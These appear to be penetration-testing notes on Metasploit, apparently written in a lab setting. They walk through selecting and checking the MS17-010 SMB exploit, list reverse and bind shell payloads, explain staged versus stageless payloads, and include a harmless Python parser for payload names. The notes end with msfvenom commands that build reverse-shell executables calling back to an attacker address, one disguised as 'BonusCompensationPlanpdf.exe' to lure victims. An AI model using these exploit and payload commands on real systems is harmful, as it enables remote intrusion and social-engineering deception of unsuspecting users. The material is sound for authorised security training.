Metasploit

apt update
apt install metasploit-framework

MSFconsole

> msfconsole

Search for a module matching the target application with the search command. Once a suitable exploit is found, copy its full name and select it with use:

msf6 > use exploit/windows/smb/ms17_010_psexec

Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command. Set LHOST to the tun0 interface:

> set LHOST tun0

Once we have both options set, we can start the exploitation. However, before we run the script, we can run a check to ensure the server is vulnerable:

msf6 exploit(windows/smb/ms17_010_psexec) > check

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.

Finally, type run (or exploit) to launch the module.

MSFvenom

List all available msfvenom payloads:

> msfvenom -l payloads

Framework Payloads (592 total) [--payload <value>]
==================================================

    Name                                                Description
    ----                                                -----------
linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid                    Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp                       Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x86/shell_find_port                           Spawn a shell on an established connection

Staged vs. Stageless Payloads

  • Staged
    The payload first sends a small stager that executes on the target and calls back to the attack box to download the remainder of the payload over the network, then executes that shellcode to establish the reverse shell.
  • Stageless
    The whole payload is delivered at once. Beneficial when bandwidth is limited or latency is high, where a staged payload can give an unstable shell. Sometimes better for evasion purposes, since less traffic passes over the network to execute the payload.

In MSFvenom, we can distinguish staged and stageless payloads by name: in a staged payload the stage and stager are separated by /, in a stageless payload they are pressed together with _.
E.g. windows/meterpreter/reverse_tcp and windows/meterpreter_reverse_tcp: the former is staged, the latter stageless.
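
The naming rule above, as an added example that is not part of these notes or of Metasploit itself: a small Python parser that splits payload names from an msfvenom -l listing into platform/arch/stage/stager and labels each as staged or stageless. The STAGES and ARCHES sets are assumptions that cover the names used on this page, not Metasploit's full list.

```python
import re

# Known stage names and architecture tokens: an assumption that covers the
# names on this page, not Metasploit's full list.
STAGES = {"shell", "meterpreter", "dllinject", "vncinject", "upexec"}
ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}


def classify_payload(name):
    """Split a payload name into platform/arch/stage/stager and label it
    staged (stage/stager joined by /) or stageless (joined by _)."""
    parts = name.split("/")
    platform, rest, arch = parts[0], parts[1:], None
    if rest and rest[0] in ARCHES:
        arch, rest = rest[0], rest[1:]
    kind, stage, stager = "unknown", None, None
    if len(rest) == 2 and rest[0] in STAGES:
        # Staged: stage and stager are separate path components.
        kind, stage, stager = "staged", rest[0], rest[1]
    elif len(rest) == 1:
        # Stageless: one component with the stage and stager pressed together.
        for s in STAGES:
            if rest[0].startswith(s + "_"):
                kind, stage, stager = "stageless", s, rest[0][len(s) + 1:]
    # Names outside this shape (e.g. cmd/ payloads that carry a script rather
    # than shellcode) stay "unknown" instead of being guessed at.
    return {"name": name, "platform": platform, "arch": arch,
            "kind": kind, "stage": stage, "stager": stager}


# Constructed sample: a few `msfvenom -l payloads` lines as printed on this page.
LISTING = """\
linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x86/shell_find_port                           Spawn a shell on an established connection
"""


def classify_listing(text):
    """Return {name: kind} for every Name/Description line; headers are skipped."""
    result = {}
    for line in text.splitlines():
        m = re.match(r"^\s*(\S+/\S+)(?:\s+|$)", line)
        if m:
            result[m.group(1)] = classify_payload(m.group(1))["kind"]
    return result


if __name__ == "__main__":
    for n, k in classify_listing(LISTING).items():
        print(f"{k:10} {n}")
```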

Building a payload

Linux x64 stageless reverse shell:

> msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

Windows stageless reverse shell:

> msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes